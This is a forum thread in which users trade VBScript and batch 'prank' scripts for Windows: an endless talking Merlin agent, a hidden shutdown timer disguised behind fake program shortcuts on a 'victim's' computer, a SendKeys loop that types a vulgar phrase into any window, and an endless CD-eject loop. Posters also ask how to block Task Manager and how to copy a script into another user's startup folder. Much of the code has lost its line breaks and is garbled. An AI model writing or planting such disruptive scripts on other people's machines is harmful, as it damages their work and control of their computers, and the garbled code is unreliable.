xisto Community
KansukeKojima

Vbscript Prank :p

this one i cool tooVbscript Prank :P

I saw iGuest's post and one too, but this one doesnt stop teleporting and speaking.

doStrAgentName2 = "MERLIN"StrAgentPath2 = "C:WindowsMsagentChars" & strAgentName2 & ".Acs"Set objAgent2 = CreateObject("Agent.Control.2")ObjAgent2.Connected = TRUEObjAgent2.Characters.Load strAgentName2, strAgentPath2Set objPeter = objAgent2.Characters.Character(strAgentName2)ObjPeter.MoveTo 700,300ObjPeter.ShowObjpeter.Speak("hi, I'm a virus.")Objpeter.Speak("my name is too gay to tell u.")Objpeter.Play"domagic1"Objpeter.Play"domagic2"Set objAction= objPeter.HideDo While objPeter.Visible = TrueLoopStrAgentName2 = "MERLIN"StrAgentPath2 = "C:WindowsMsagentChars" & strAgentName2 & ".Acs"Set objAgent2 = CreateObject("Agent.Control.2")ObjAgent2.Connected = TRUEObjAgent2.Characters.Load strAgentName2, strAgentPath2Set objPeter = objAgent2.Characters.Character(strAgentName2)ObjPeter.MoveTo 400,300ObjPeter.ShowObjpeter.Speak("I'm only teleporting and speaking to irritate u.")Set objAction= objPeter.HideDo While objPeter.Visible = TrueLoopTrAgentName2 = "MERLIN"StrAgentPath2 = "C:WindowsMsagentChars" & strAgentName2 & ".Acs"Set objAgent2 = CreateObject("Agent.Control.2")ObjAgent2.Connected = TRUEObjAgent2.Characters.Load strAgentName2, strAgentPath2Set objPeter = objAgent2.Characters.Character(strAgentName2)ObjPeter.MoveTo 700,900ObjPeter.ShowObjpeter.Speak("here I am again!")Set objAction= objPeter.HideDo While objPeter.Visible = TrueLoopStrAgentName2 = "MERLIN"StrAgentPath2 = "C:WindowsMsagentChars" & strAgentName2 & ".Acs"Set objAgent2 = CreateObject("Agent.Control.2")ObjAgent2.Connected = TRUEObjAgent2.Characters.Load strAgentName2, strAgentPath2Set objPeter = objAgent2.Characters.Character(strAgentName2)ObjPeter.MoveTo 300,900ObjPeter.ShowObjpeter.Speak("I will go on till u reboot your computer.")Set objAction= objPeter.HideDo While objPeter.Visible = TrueLoopLoop
save as .Vbs, open and u will see how this thing sucks.

maybe someone can make this program block task manager, that would be cool

-reply by bartian

how to stop a shutdown commandVbscript Prank :P<p>hey you can stop the shutdown.</p><p>just open run and then type shutdown -a, this stops most of the time every shutdown command.</p><p>I just discovered batch files and I hacked a school computer with it :)</p><p>have fun!</p>-reply by jessy

of course you could do ctrl-alt-del............. UNLESS IT ISNT ALLOWED!!! the computers at school won't allow the "three fingered salute" so they have to log off.

Anyone know how to get it to make a copy of itself into their startup folder? we each have a seperate account....

HAAH!!111!!!oneone!!!! THIS IS EVEN BETTER!!!!
Alright... this is even more amazing than the first, but its incredibly malicious an even more evil ^_^ (in fact, I don't think you can even turn it off with CTRL + ALT + DELETE :D ). What it does in shut off their computer after a said amount of time :P

1. Create a new .bat file (batch file) with notepad

2. Input the following code and save it:

@echoshutdown.exe -s -t 120 -c "Input your message here"
(120= 120 seconds, change to last longer or shorter)

3. Again, hide the file somewhere on the victims computer and create multiple shortcuts to it and change the icon so they look like normal programs.

4. Sit back and enjoy the pain and suffering MHahahaha..... :P
You must remember that you can turn it off! go to "run" and enter shutdown-a (abort shutdown)

This one is awesome!

do
set shl = createobject("wscript.shell")
shl.sendkeys "I Eat Donkey Balls"
wscript.sleep 8000

loop

Save as a .vbs

When you click it, Windows will automaticly write ''I Eat Donkey Balls'' every eight seconds, no matter where you are writing!

I got one, it's a VBS prank, it opens the cd tray and then if they close it it reopens, making it useless. you can either run it at startup, or just make shurtcuts to it as you previousley mentioned.

The code:

do[/i][i]Set oWMP = CreateObject("WMPlayer.OCX.7" )Set colCDROMs = oWMP.cdromCollection[/i][i]if colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNext ' cdromEnd If[/i][i]loop

save it as whateveryouwant.vbs and run it on a friends computer.